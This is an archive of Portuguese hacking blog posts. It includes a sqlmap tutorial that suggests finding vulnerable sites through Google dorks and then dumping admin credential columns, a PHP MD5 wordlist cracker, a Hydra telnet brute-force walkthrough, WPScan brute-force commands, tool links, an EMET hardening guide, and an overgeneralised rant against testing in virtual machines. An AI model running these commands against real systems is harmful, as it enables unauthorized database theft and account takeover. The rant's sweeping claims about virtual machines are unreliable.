Mostrando postagens com marcador Security e Hacking. Mostrar todas as postagens
Mostrando postagens com marcador Security e Hacking. Mostrar todas as postagens

terça-feira, 30 de julho de 2013

SQLMAP SQL Injection para quem está iniciando

Lembre-se que o uso incorreto dessa técnica é crime, e o meu objetivo de mostrar essas informações aqui é apenas para aprendizado e testes em ambientes controlados e ou clientes.
Abra um terminal no backtrack e vamos usar a ferramenta SQLMAP
OBS: 24/4/2013 é perfeitamente possível e recomendável usar o Kali Linux para seguir esse tutorial, para isso basta executar o comando sqlmap + (parametros) direto no terminal sem entrar em nenhum diretório específico. E se vc seguiu nossa dica de instalação do Kali Linux e configurou o TOR vc pode usar ao final de cada comando digitado o parametro –tor (dois traços) e fazer as auditorias de forma anônima segue o link da dica:
cd /pentest/database/sqlmap
Vamos executar o sqlmap
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 –-dbs
Você precisa ter um alvo vulnerável para conseguir, para saber se o alvo é vulnerável, basta por uma ‘ no final da url e dar “enter” se retornar algum erro de banco de dados o alvo é vulnerável. Pode ser usar o google para isso fazendo por exemplo a seguinte buscainrul:noticias.php?id=1 Existem várias outras possibilidades que podem ser usadas para busca.
O campo “current database” vai mostrar o nome do BD vulnerável, daí basta usarmos as opções para explorarmos. Podemos listar todas as tabelas.
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD –-tables
Devemos trocar NOMEDOBD pelo valor obtido em “current database”
O Resultado vai ser algo parecido com isso:
Screenshot-4
Daí podemos escolher uma tabela e listar as colunas
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin –-columns
O resultado será parecido a esse:
Screenshot-6
Podemos escolher quais colunas queremos extrair informações
./sqlmap.py -u http://www.exemplo.com/viewfaculty.php?id=12 -D NOMEDOBD
 -T admin -C id,passwrd,u_name –-dump
Entendendo as técnicas é possível extrair todos os dados que desejar do Banco vulnerável

quarta-feira, 6 de fevereiro de 2013

OpenVAS

OpenVAS é um scanner de vulnerabilidade que foi bifurcada da última versão livre do Nessus após Nessus foi patenteado em 2005. Ela continua a crescer, com mais de 23 mil testes a partir de novembro de 2011. OpenVAS plugins são escritas na mesma linguagem usada pelo NASL Nessus. Para downloads e mais informações, visite a página do OpenVAS.

Link: http://www.openvas.org/download.html

Zed Attack Proxy 2.0.0

 
O Proxy Ataque Zed (ZAP) é uma ferramenta fácil de usar testes integrados de penetração para encontrar vulnerabilidades em aplicações web. Ele é projetado para ser usado por pessoas com uma ampla gama de experiência em segurança e, como tal, é ideal para desenvolvedores e testadores funcionais que são novos para testes de penetração. ZAP fornece scanners automáticos, bem como um conjunto de ferramentas que permitem a você para encontrar vulnerabilidades de segurança manualmente.

Link para windows: http://packetstormsecurity.com/files/download/119965/ZAP_2.0.0_Windows.exe
Link para o Linux:  http://packetstormsecurity.com/files/download/119963/ZAP_2.0.0_Linux.tar.gz

Mole

Mole é um automático ferramenta SQL Injection exploração. Apenas fornecendo uma URL vulnerável e uma seqüência válida no site ele pode detectar a injeção e explorá-lo, usando a técnica de união ou uma técnica baseada em consulta booleana. O Mole usa uma interface de comando baseada, permitindo ao usuário para indicar a ação que ele quer executar facilmente. O CLI também fornece auto-realização em ambos os comandos e argumentos de comando, fazendo com que o usuário digite o menos possível.

Link: http://sourceforge.net/projects/themole/files/latest/download?source=directory

Dynipdrop

dynipdrop main config file 

Dynipdrop é um IDS-receptor e escrito em C. Às vezes eu quero cair remotos xx segundos IP, e Undrop quando timeout; xxx Gota Às vezes sniffer servidor encontrar um hack de ação e eu quero dizer a outro servidor / servidor-grupo "IP. xxx.xxx.xxx segundo xX ".

Portanto, este programa - dynipdrop (daemon "dynipdrop" e "ipdrop_local" para enviar uma queda msg-de localhost, e "ipdrop_udp" para enviar uma queda msg para outro servidor (instalado o daemon dynipdrop).

dynipdrop rodar em Linux e iptables necessidade, eu uso "portsentry (http://sourceforge.net/projects/sentrytools/" + "sshdprotect" + "dynipdrop" para proteger meus servidores, e espero que este software faça alguma ajuda para você.


Link: http://sourceforge.net/projects/dynipdrop/files/latest/download?source=directory

Linux IPTables Firewall 1.4.17

iptables é construído em cima de netfilter, o quadro de alteração do pacote para Linux 2.4.x e 2.6.x. É uma grande reformulação do ipchains seu antecessor, e é usado para controlar a filtragem de pacotes, Tradução de Endereços de Rede (masquerading, portforwarding, proxy transparente), e os efeitos especiais, tais como a desconfiguração do pacote.

Link: http://packetstormsecurity.com/files/download/119858/iptables-1.4.17.tar.bz2

SQLSentinel

SQLSentinel

SQLSentinel é uma ferramenta opensource que automatiza o processo de encontrar a injeção de SQL em um site. SQLSentinel inclui uma teia de aranha e sql localizador de erros. Você dá entrada em um site e SQLSentinel rastreia e tentar explorar os parâmetros de erro de validação para você. Quando o trabalho for concluído, ele pode gerar um relatório pdf que contém o vuln url encontrado eo url rastreado.

Por favor, lembre-se que SQLSentinel não é uma ferramenta de exploração. Ela só pode encontra vulnerabilidades url


Link:  http://sourceforge.net/projects/sqlsentinel/files/latest/download?source=directory

Hcon Security Testing Framework

HCON Testing Framework Segurança é Open Source quadro Teste de Invasão baseados em tecnologias diferentes do navegador, o que ajuda qualquer profissional de segurança para ajuda no teste de penetração ou de verificação de vulnerabilidade assessments.contains webtools, que são poderosos em fazer XSS (Cross Site Scripting), SQL Injection, siXSS , CSRF, Trace XSS, RFI, LFI, etc Mesmo útil para qualquer um interessado no domínio da segurança da informação - estudantes, profissionais de segurança, desenvolvedores web, avaliações de vulnerabilidade manuais e muito mais.

Link: http://sourceforge.net/projects/hconframework/files/latest/download?source=directory

Katana : Multi-Boot Security Suite

http://www.gutterhelmetbydannet.com/images/Katana_logo.gif 
Pacotes de segurança Katana / distribuições de hackers éticos (como Backtrack, Ophcrack, & UBCD), juntamente com aplicações portáteis do Windows (como Metasploit, NMAP, Cain & Able, e Wireshark) para fugir de um único drive.Features flash USB

     100s de segurança / éticos ferramentas de hacking
     Inicializar a partir de múltiplas distribuições ao vivo
     Executar hundres de aplicação portátil de segurança do Windows a partir de um único drive flash
     Adicionar distribuições adicionais e aplicações portáteis


Link: http://sourceforge.net/projects/katana-usb/files/latest/download?source=directory

WebSploit Framework




WebSploit é um projeto Open Source para: Obras de engenharia social, Web Scan, esteiras e Análise, Exploiter automática, ataques de rede de apoio ..
[+] Autopwn - Usado De Metasploit para verificação e Exploit Serviço de Destino
[+] WMAP - Scan, Crawler alvo usado De Metasploit WMAP Plugin
[+] infector formato - injetar reversa e carga se ligam em formato de arquivo

[+] Scanner phpmyadmin
[+] LFI Bypasser
[+] Apache Scanner Usuários
[+] Dir Bruter
[+] administrador localizador
[+] MLITM Ataque - Homem esquerda no meio, XSS Ataques de phishing
[+] MITM - Man In The Middle Ataque
[+] Ataque Applet Java
[+] Ataque MFOD Vector
[+] USB Infecção Ataque
[+] ARP ataque DoS
[+] Ataque do assassino Web
[+] Ataque Atualização Falso
[+] Ataque Falso ponto de acesso


Link: http://sourceforge.net/projects/websploit/files/latest/download?source=directory

Network Security Toolkit (NST)

2 - NST Geolocated Active Neflow Connections
Network Security Toolkit


Network Security Toolkit (NST) é uma imagem ISO inicializável (DVD ao vivo) baseado no Fedora 16 com fácil acesso a best-of-breed Open Source aplicações de segurança de rede e deve ser executado em mais intenção platforms.The x86/x86_64 principal de desenvolver este conjunto de ferramentas era fornecer o administrador de segurança de rede com um conjunto abrangente de ferramentas Open Source segurança da rede. A maioria dos instrumentos publicados no artigo: Top 125 Ferramentas de segurança por INSECURE.ORG estão disponíveis no kit de ferramentas. Uma interface de usuário avançada Web (WUI) é fornecido para o sistema / administração de rede, navegação, automação de geolocalização, e configuração de rede e muitas aplicações de segurança encontradas na distribuição NST. No mundo virtual, NST pode ser usado como uma garantia de validação de análise de rede, e uma ferramenta de monitoramento em servidores de empresas de hospedagem virtual máquinas virtuais.
 
Link: http://sourceforge.net/projects/nst/files/latest/download?source=directory

terça-feira, 5 de fevereiro de 2013

[PHP] Md5 Cracker




01#!/usr/bin/php
02<?php
03  
04if(!isset($argv[2])){
05echo "
06\033[1;34m[*]\033[0m MD5 Crack By MMxM
07\033[1;34m[*]\033[0m Modo de uso: $argv[0] [hash-md5] [wordlist]
08  
09";
10exit;
11}
12if(strlen($argv[1]) != 32){
13echo "\n\033[1;31m[-]\033[0m INVALID MD5 HASH\n\n";
14exit;
15}
16  
17$wl = fopen ("$argv[2]","r");
18if(!$wl){
19die("\n\nFAILED TO OPEN $argv[2]\n\n");
20}
21while (!feof ($wl)) {
22$pass = fgets($wl,4096);
23$a = chop($pass);
24if(md5($a) == $argv[1]){
25echo "\n\033[0;32m[+]\033[0m Cracked!!! [$a]\n";
26echo "\033[0;32m[+]\033[0m [$argv[1]] == [$a]\n\n";
27exit;
28} else{
29echo "\033[1;34m[*]\033[0m ",md5($a),"\t == [$a]\n";
30}
31  
32}
33fclose ($wl);
34  
35echo "\033[1;31m[-]\033[0m No Password crackeds :/\n";
36echo "\033[1;34m[*]\033[0m (100% complete)\n\n";
37?>
Poderá também gostar de:

quinta-feira, 3 de janeiro de 2013

Ataque de brute force com Hydra

Introduçao
Senhas são talvez o elo mais fraco em qualquer sistema de segurança existente hoje em dia. Nem sempre o administrador, que tem conhecimento de questões relacionadas à segurança da informação, pode acompanhar o usuário e garantir que ele faça uma escolha de senha segura. Muitas vezes, nem mesmo quando se define regras para senhas pode-se ter 100% de certeza que uma senha segura será a escolhida.

Por exemplo, imagine que você definiu uma regra que requer que seja escolhida uma senha de no mínimo 8 caracteres, letras maiúsculas e minúsculas e números. Se o seu usuário escolher algo como "Pedro123" você continuará a ter uma senha insegura. Mas o pior lado dessa história é que o atacante também sabe que senhas são inseguras e muito frequentemente se aproveita desse fato para ganhar acesso ilegal ao seu sistema. A técnica mais simples utilizada por usuários maliciosos é o brute forcing. Neste post, vou definir o que é brute force e também vou mostrar a ferramenta THC Hydra utilizada em ataques deste tipo

UM Pouco da Historia


O sistema de login e senha é um dos esquemas de segurança mais antigos e funcionais que existe. A história do uso de senhas é bem antiga, datada da Idade Média onde donos de fortalezas requisitavam uma palavra chave para que as pessoas pudessem entrar quando dissesse a palavra correta. Na década de 60, começaram a intensificar as pesquisas e o desenvolvimento de novas tecnologias. Foi aí que surgiram sistemas operacionais robustos e multiusuários. Para poder diferenciar as pessoas e impedir que qualquer um possa ter acesso aos computadores, cientistas do MIT implementaram o esquema da "palavra chave" para o mundo virtual. Foi aí que surgiram as primeiras telas de login e senha. Mas além de criar um esquema que impeça o uso dos computadores por pessoas não autorizadas, é necessário que haja um mecanismo de autenticação relativamente seguro no momento do login, para que impeça a ação dos mais espertos.

O que é um Brute force


Levando o termo ao pé da letra, significa "força bruta". É um método usado para descobrir senhas a modo bruto, onde é testado todas as combinações possíveis. O atacante usa ferramentas que gera lista de palavras (senhas) a seres testadas no alvo, um exemplo disso é o crunch, onde a ferramenta possibilita a criação de senhas ao nosso modo (somente numeros, somente letras, etc).
Apos a criação da wordlist (Lista de palavras), é hora de usar a ferramenta (THC Hydra) capaz de testar todas as senhas que foram criadas no alvo e caso alguma combinação de senha for aceita, irá exibir o resultado para nós. 

THC Hidra

 A ferramenta foi criada por um grupo de hackers alemão, chamado THC ha alguns anos. A ferramenta aceita os seguintes protocolos.
  • AFP
  • Cisco AAA
  • Cisco auth
  • Cisco enable
  • CVS
  • Firebird
  • FTP
  • HTTP-FORM-GET
  • HTTP-FORM-POST
  • HTTP-GET
  • HTTP-HEAD
  • HTTP-PROXY
  • ICQ
  • IMAP
  • IRC
  • LDAP2
  • LDAP3
  • MS-SQL
  • MYSQL
  • NCP
  • NNTP
  • Oracle
  • Oracle-Listener
  • Oracle-SID
  • PC-Anywhere
  • PCNFS
  • POP3
  • POSTGRES
  • RDP
  • REXEC
  • RLOGIN
  • RSH
  • SAP/R3
  • SIP
  • SMB
  • SMTP
  • SMTP-Enum
  • SNMP
  • SOCKS5
  • SSH(v1 and v2)
  • Subversion
  • Teamspeak (TS2)
  • Telnet (Protocolo que iremos utilizar)
  • VMware-Auth
  • VNC and XMPP.

Existe uma versão gráfica da ferramenta chamada xhydra.

  A distribuição BackTrack já possuí essa ferramenta instalada.




Instalaçao

A instalação do Hydra é bem simples, basta você baixar o pacote aqui.
$ wget http://www.thc.org/releases/hydra-7.2-src.tar.gz
Depois vamos descompactar a pasta.
$ tar -xvzf hydra-7.2-src.tar.gz
Vamos agora entrar na pasta
$ cd hydra-7.2-src
E iniciar a instalação com os comandos abaixo:
$ ./configure
$ make
$ make install

Depois disso, você pode usar o Hydra a vontade. Abaixo um pequeno script que baixa e instala o hydra pra você.
#!/bin/bash
# Por Jarlley Ribeiro @0fx66
echo " [x] Downloading Hydra..."
wget http://www.thc.org/releases/hydra-7.2-src.tar.gz 1> /dev/null 2> /dev/stdout

echo " [x] Unpacking files..."
tar -xvzf hydra-7.2-src.tar.gz 1> /dev/null 2> /dev/stdout
cd hydra-7.2-src 1> /dev/null 2> /dev/stdout

echo " [x] Starting the instalation..."
./configure 1> /dev/null 2> /dev/stdout
make 1> /dev/null 2> /dev/stdout
make install 1> /dev/null 2> /dev/stdout

echo "Run in the terminal: hydra --help for more options..."
Para rodar o script, dê a permissão de execução no arquivo.
$ chmod +x Hydra_install.sh
 
Exemplo de um ataque usando o hidra 


Agora, vamos demonstrar uma ataque a um servidor telnet utilizando o hydra. Primeiro, você deve ter em mãos as seguintes informações:
  • Hydra instalado
  • WordList
  • IP do alvo
Para buscar o IP do alvo, você pode usar o Nmap que realiza um scanner nas porta e mostra pra nós os resultados. Aconselho a usarem a ferramenta em máquinas virtuais, pois invasão é crime ;-)

Para descobrir os serviços em uma determinada máquina, rode no terminal o seguinte comando.
$ nmap -sV Endereço_IP
O resultado será o seguinte:
$ nmap -sV 192.168.1.140

Starting Nmap 5.00 ( http://nmap.org ) at 2012-05-25 02:52 UTC
Interesting ports on xpsp0 (192.168.1.140):
Not shown: 993 closed ports
PORT     STATE SERVICE       VERSION
23/tcp   open  telnet        Microsoft Windows XP telnetd
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows XP microsoft-ds
1025/tcp open  msrpc         Microsoft Windows RPC
3389/tcp open  ms-term-serv?
5000/tcp open  upnp          Microsoft Windows UPnP
MAC Address: 08:00:27:B1:AF:83 (Cadmus Computer Systems)
Service Info: OSs: Windows XP, Windows

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.54 seconds
Depois de saber que o nosso alvo está On, vamos rodar no terminal o seguinte comando:
$ hydra -s 23 -l ribeiro -P PASSFILE.txt -o LogFile.txt -4 -V 192.168.1.140 telnet
Vamos agora analisar todos os parâmetros passados a ferramenta.
Ps: Usei o máximo de parâmetros para demonstração, mas não é necessário os parâmetros -s, -o -4. Fica a seu critério :-)
  • hydra: Software usado no ataque
  • -s 23: Porta usada (caso o administrador mude)
  • -l ribeiro: O usuário (caso não sabia, use a opção -L com a lista de possíveis nomes)
  • -P PASSFILE.TXT: Lista de possíveis senhas geradas pelo chunch
  • -o LogFile.txt: Log criado com os dados
  • -4: IP versão 4 (caso seja o v6, utilizar "-6") 
  • -V: Modo verbose (mostra o processo rodando)
  • 192.168.1.140: IP do alvo. (Máquina virtual)
  • telnet: Servidor que decidi atacar
É exibido o seguinte:
Hydra v7.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2012-05-25 03:02:16
[WARNING] telnet is by its nature unreliable to analyze reliable, if possible 
better choose FTP or SSH if available
[DATA] 9 tasks, 1 server, 9 login tries (l:1/p:9), ~1 try per task
[DATA] attacking service telnet on port 23
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "111" - 1 of 9 [child 0]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "222" - 2 of 9 [child 1]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "333" - 3 of 9 [child 2]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "444" - 4 of 9 [child 3]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "555" - 5 of 9 [child 4]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "666" - 6 of 9 [child 5]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "777" - 7 of 9 [child 6]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "888" - 8 of 9 [child 7]
[ATTEMPT] target 192.168.1.140 - login "ribeiro" - pass "999" - 9 of 9 [child 8]
[23][telnet] host: 192.168.1.140   login: ribeiro   password: 666
[STATUS] attack finished for 192.168.1.140 (waiting for children to finish)
1 of 1 target successfuly completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2012-05-25 03:02:19
Podemo ver ali que a senha foi "crackeada".




Vamos agora tentar logar no servidor com a senha que o programa mostrou.



Estamos dentro ;-)
Podemos ver como uma senha "fraca" pode causar, imagina se fosse uma grande empresa?


Referencia Nos Lnks:

Evitando exploração de falhas

Esse artigo tem como objetivo demonstrar como instalar e configurar o EMET para reduzir a exploração das falhas de segurança em seu computador de forma rápida e fácil.

 

Visão Geral

Praticamente todos os softwares já tiveram alguma vulnerabilidade de segurança e para aqueles que ainda não tiveram é só questão de tempo para que algum hacker ou estudante de tecnologia descubra a vulnerabilidade e torne-a pública. Foi pensando nisso que a Microsoft criou o EMET (Enhanced Mitigation Experience Toolkit). O EMET foi criado para reduzir a exploração das falhas de segurança utilizadas pelos hackers para obter acesso aos sistemas que tem vulnerabilidades conhecidas e as de Zero-day Attack.

Um dos grandes desafios para os usuários nos dias de hoje é manter os seus computadores atualizados e seguros e eu não estou falando aqui somente dos sistemas operacionais da Microsoft, mas de todos os outros milhares de softwares que são instalados nos computadores, como o Adobe Reader, Winzip, Firefox, Apple QuickTime, etc.

Os grandes fornecedores de softwares como a Microsoft tem disponibilizado atualizações de segurança constantemente para evitar que os seus softwares sejam explorados por hacker, porém em alguns casos essas vulnerabilidades são descobertas antes dos fabricantes e tornam-se públicas sem um aviso prévio. Quando isso acontece o software fica vulneravél ao Zero-day Attack até que uma correção seja criada e distribuída pelo fabricante. Como workaround [contornar o bug sem o resolver] você poderá utilizar o EMET para proteger o seu sistema até que uma correção seja disponibilizada.

Nota
O EMET permite forçar o uso do DEP, ASLR e SEHOP em todo o seu sistema, o qual impede que alguns erros de programação comuns resultem em vulnerabilidades exploráveis. Em nível de aplicação é possível forçar o uso do DEP, SEHOP, NullPage, HeapSpray, EAF, MandatoryASLR.


Requisito do sistema
O EMET suporte para os computadores executando o sistema operacional Windows cliente e servidor. Segue abaixo a lista dos sistemas operacionais suportados:


Sistema operacional
  • Windows XP Service Pack 3 e superior
  • Windows Vista Service Pack 1 e superior
  • Windows 7 todos Service Packs
Sistema Operacional Servidor
  • Windows Server 2003 Service Pack 1 e superior
  • Windows Server 2008 todos Service Packs
  • Windows Server 2008 R2 todos Service Packs

Instalando o Emet

1 – Para instalar o EMET faça primeiro o download em:

http://www.microsoft.com/en-us/download/details.aspx?id=29851

2 – Abra o programa de instalação e proceda com ela normalmente.

Lembrando que não é necessário reiniciar o sistema, mas caso as aplicações que você for adicionar para o EMET criar a proteção seja algo do sistema ou algo muito importante é altamente recomendável que você reinicie o sistema.

Configurando o Emet


Após instalar o EMET em seu computador, o próximo passo é configurar, porém antes de sair configurando todos os softwares do seu computador para usar o EMET, é importante que você faça antes todos os testes necessários para cada software individualmente, porque dependendo do software ou configuração que você fizer com o EMET ele poderá causar indisponibilidade na utilização do software. Então habilite primeiro o EMET para os softwares que são considerados maiores vetores de ataques dos hackers, como por exemplo, leitores de PDF, navegadores web, programas de mensagem instantâneas, e qualquer outro software que tenha conectividade com a Internet.

1 – Clique em Start, All Programs, Enhanced Mitigation Experience Toolkit e clique no programa EMET. Será carregada a caixa de diálogo conforme mostra a figura.




2 – Na caixa de diálogo User Account Control clique no botão Yes para permitir a execução do programa EMET em seu computador. Será carregada a janela conforme mostra a figura.




3 – Na parte superior da janela do EMET clique no botão Configure System. Será carregada a caixa de diálogo conforme mostra a figura.




4 – Na caixa de diálogo System Configuration você tem as opções DEP, SEHOP e ASLR, as quais afetará todo o sistema.

O recomendável é manter a opção Application Opt-In nas três opções do Mitigation, o qual fica a critério do EMET habilitar a proteção ou não em seu sistema. Se você quiser configurar a segurança máxima, poderá habilitar o Maximum Security Settings no Profile Name. Selecionando essa opção você talvez tenha alguns travamentos adicionais em seu sistema, nesse caso você precisará retornar a configuração para Application Opt-In. Escolha a configuração desejada e em seguida clique no botão OK. Em nosso exemplo, não iremos alterar essa configuração.

Nota
No Windows XP e Windows Server 2003, apenas o DEP está disponível.

5 – Na parte inferior clique no botão Configure Apps. Será carregada a janela conforme mostra a figura.




6 – Na caixa de diálogo Application Configuration clique no botão Add para adicionar uma aplicação que será configurada pelo EMET. Será carregada a caixa de diálogo conforme mostra a figura.



7 – Na caixa de diálogo Add Application localize o software que será configurado pelo EMET e em seguida clique no botão Open. Em nosso exemplo, iremos selecionar o software Adobe Reader. Será carregada a janela conforme mostra a figura.




Por padrão o EMET irá marcar todas as opções (DEP, SEHOP, NullPage, HeapSpray, EAF, MandatoryASLR), porém dependendo do software que você tenha adicionado na lista uma das opções poderá ser incompatível, o qual poderá causar um travamento do software, então faça vários testes antes de colocar em produção.

8 – Na caixa de diálogo Application Configuration clique no botão OK. Será carregada a janela conforme mostra a figura.




Nota
No final da janela do EMET é exibido a mensagem The changes you have made may require restarting one or more applications.

9 – Execute o programa que você configurou nos passos anteriores, em nosso exemplo iremos executar o Acrobat Reader. A janela do EMET exibirá o processo do Adobe Reader conforme mostra a figura.




Como você pode ver o Adobe Reader (processo AcroRd32) está sendo executado com a proteção do EMET. Agora é só repetir o mesmo procedimento para adicionar outros softwares na lista.
Recomendações de aplicações para serem adicionadas ao EMET: Adobe Reader, Adobe FlashPlayer, Adobe Photoshop, Messenger Live, Mozilla Firefox, Google Chrome, Google Earth, Opera, Safari, WinRar. Entre outros que você achar potencialmente perigosos e que possam abrir falhas no seu sistema.

fonte: SH

sábado, 7 de julho de 2012

Descobrindo vulnerabilidades em WordPress - WPSCAN

WPScan  é um Scanner de segurança para WordPress escrito em Ruby que tenta encontrar falhas de segurança conhecidas no interior das instalações WordPress. Usados pelos profissionais de segurança ou administradores WordPress para avaliar a postura de segurança de suas instalações de WordPress. A base de código é Open Source e licenciado sob a GPLv3 .
As características incluem:

Enumeração nome de usuário
Quebra de senha fraca (multithreaded)
Enumeração versão
Enumeração de vulnerabilidade (baseado na versão)
Enumeração dos plugin
Enumeração vulnerabilidade dos plugins (baseado na versão)
Outros cheques diversos

Instalação:


Instalando no Backtrack 5, ela é incluida no BT 5 R1



sudo apt-get install libcurl4-gnutls-dev
sudo gem install --user-install mime-types typhoeus xml-simple


Instalando no Debian/Ubuntu



sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby
sudo gem install typhoeus xml-simple



Comandos:



--url ( A url do wordpress para escanear)
--enumerate enumeração ( Tipo de enumeração a fazer, podendo ser , u = usuario, v = versão , t = timthumb , p = plugin)
--wordlist ( Fornecer um arquivo contendo as possiveis senhas para o wpscan tentar o brute force)
--username (brute force apenas com um usuario especifico
--generate_plugin_list ( gera uma lista dos plugins )


Exemplos:



Checagem "Não intrusiva"

./wpscan.rb --url www.exemplo.com


Fazer um ataque de força bruta ultilizando o arquivo darkc0de.lst
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --threads 50


Fazer um ataque de força bruta apenas usando o login "admin"
./wpscan.rb --url www.exemplo.com --wordlist darkc0de.lst --username admin


Gerar uma nova lista de plugin 'mais popular', até 150 páginas ...
./wpscan.rb --generate_plugin_list 150


Enumerar plugins instalados
./wpscan.rb --url www.exemplo.com --enumerate p

Pentest no próprio pc com máquinas virtuais não funcionam!

PROVA DE QUE CONFIAR EM MÁQUINAS VIRTUAIS PARA PENTEST É SUICÍDIO PARA O PENTESTER PROFISSIONAL!

Senhores, boa noite, em plena madrugada vou escrever explicando e provando pela experiência que pentest se deve fazer de computadores de fora da rede totalmente.

Muitos hackerS e professores, erroneamente ensinam que para saber se seu computador está protegido, você deve instalar uma máquina virtual, instalar um sistema operacional e instalar neste ferramentas hackers para fazer o pentest, ou então instalar uma distribuição de pentest como o backtrack que eu inclusive sou fan e só uso ele. Basta testar com máquina virtual e está tudo perfeito. Será?

Bem, vamos comparar a experiência que fiz e tive e tirem suas conclusões:

Pentest usando máquina virtual com backtrack 4 instalado.

Ferramentas hackers usadas:

Nessus
Nmap
Nbtscan
SMtpscan
DNSscan
Super Scan
entre outros!

Foi desativado o serviço de netbios, icmp, bloqueando com o comodo firewall que é o melhor firewall do mundo na minha opnião para home users todas as conexoes de entrada.
Instalado IDS valhala honey pot e SAX2 (excelente honeypot paga). Entre outras configurações de segunrança para o windows 7 temos a seguir:

O resultado é que mesmo, com todo este arsenal, o IDS identificou o scanning dos scanners
Os scanners conseguiram se conectar as portas, mesmo estando ativado no firewall para bloquear todas e quais conexões de entrada. No meu caso apareceu aberta a porta 135 do serviço rpc e outras também com serviço rpc. identificado o sistema operacional windows pelos scanners.

Agora, usando um outro computador, mas que está na mesma rede, usando um roteador, O RESULTADO, FOI O MESMO!

Agora, olha que fantástico!


Conectando meu computador alvo em meu modem.


E o computador para fazer o pentest em uma rede wireless. A máquina de ataque está em uma rede diferene aqui amigos!


TEMOS UMA ATAQUE REAL AQUI. NÃO É REDE VIRTUALIZADA E NÃO ESTÁ NA MESMA REDE.

Sabem qual foi o resultado?

Não consegue scannear com nmap, nem com nessus, nem com nada!
Não consegue se conectar absolutamente a nenhuma porta.
Não consegue saber qual sistema operacional está funcionando!

O IDS nem identificou nada, por que não houve conexão!

O computador atacado estava com as mesmas configurações de antes. E nada do ataque funcionar! Veja os procedimentos que usei para defender meu sistema!


O firewall comodo, bloqueando todas as conexões de entrada além de outras regras mais rígidas.
Serviçoes de acesso remoto foram desativados.
Serviços de netbios desativados. Compartilhamento de arquivos desativado.
Em fim, nada de identificação.

Os scanners apenas conseguem saber se estou online, só isso, mas nada!


Desativando as defesasFazendo o ataque com o computador vulnerável para testar a efetividades de ferramentas sendo usadas sozinhas como o IDS.

Desativei o firewall, e ativei os serviços de net bios e todos os outros de acesso remoto e deixei só o IDS SAX2 e o valhala.

Consegui então scannear as portas 135 e outras de serviço rpc.

O VALHANA HONEYPOT, NÃO CONSEGUIU IDENTIFICAR O ATAQUE.

O SAX2 HONEYPOT CONSEGUIU! Parabéns!

A conclusão que podemos tirar disso tudo é que, o valhala, identifica ataques de máquinas virtuais, mas de outro computador, se você for atacado com stealth scan, ele não pega, e você naõ saberá que está sendo invadido.

Muitas pessoas ficam iludidas com a eficiência do valhala por que TESTAM COM MÁQUINA VIRTUAL PARA SABER SE ELE FUNCIONA. Mas na vida real é diferente, a pergunta que devemos fazer é. será que em um ataque real de outra rede, meu ids vão funcionar? Meu firewall vai bloquear?

O SAX2 está de parabéns conseguiu identificar, mas quando eu coloquei o firewall para bloquear todas as conexões de saída, ele nem identificou por que o nmap e nessus não conseguem scannear nenhuma porta!

Com este relato inédito talvez, vocês aprendizes e até experientes, sabem que para ver realmente se tudo está protegendo, e se o seu pc ou rede está funcionando, É NECESSÁRIO FAZER O PENTEST DE UMA REDE TOTALMENTE DIFERENTE DA SUA, DE OUTRO COMPUTADOR!

Por que é necessário simular um ataque real para testar sua segurança!

Muitos vídeos no you tube os ataques são à máquinas virtuais, mas na realidade, sem ser com máquinas virtuais não funcionam!

E as vezes um tipo de defesa de firewall funcionam na simulação de máquinas virtuais, mas quando o ataque é feito de outra rede os firewalls não funcionam! Ou o mesmo acontece para IDS, como aconteceu com o valhala que não identificou o ataque onde as portas scannear apareceram no scanner nmap e nessus, mas o valhala não identificou. E eu testei com scan invisível, com agressivo que é facilmente identificável. Mas nada do valhala funcionar!

OUTROS DETALHES ALARMANTES!

Configurei o FIREWALL DO WINDOWS, DA SYMANTEC OU NORTON, E OUTROS
Programei eles para bloquear todas as conexões de entrada.

Fiz o mesmo ataque e:

O nmap e nessus identificou as portas!
COMO É QUE VOCÊ MEU AMIGO PAGA R$ 100 POR ANO POR UMA DROGA DESSA!

O comodo firewall que é grátis, só permitiu que o nmap e nessus identificasse meu computador alvo como online, só isso, nada de nenhuma porta, nada de nenhum serviço, nada de identificação de sistema operacional algum. FANTÁSTICO SIMPLESMENTE É GRATUITO!


CONCLUSÃO

Se quer ser um hacker, e fazer pentest, compre e tenha dois computadores e use redes totalmente isoladas umas das outras. NÃO USE MÁQUINAS VIRTUAIS POR QUE O TESTE PODE SER ENGANOSO! Me agradeçam pois muitos iniciantes pensam que máquinas virtuais simulam igualmente um ataque real. TOTALMENTE ERRADO ISSO, E TEM GENTE ENSINANDO ISSO POR TODO O LUGAR! EU JÁ CAI NESTE CONTO, MAS AGORA ANIQUILAR ESTA MIRAGEM QUE ENGANA VÁRIOS PROFISSIONAIS DE SEGURANÇA!

Faça o pentest, para testar todos as ferramentas.
Eu scannei com o firewall ativado para testar o firewall.
Depois sem o firewall para saber o que acontecia, mas com o ids ligado para ver se ele funciona mesmo, E o valhala, por exemplo não passou no teste e eu não uso aquilo mais!
Scanneei de novo, sem nada ativo para saber que portas aparecem , para saber se algum serviço que desativei, aparece no scan, POIS ASSIM SABERIA QUE NÃO FUNCIONOU A DESATIVAÇÃO E ENTÃO RESOLVERIA O PROBLEMA.

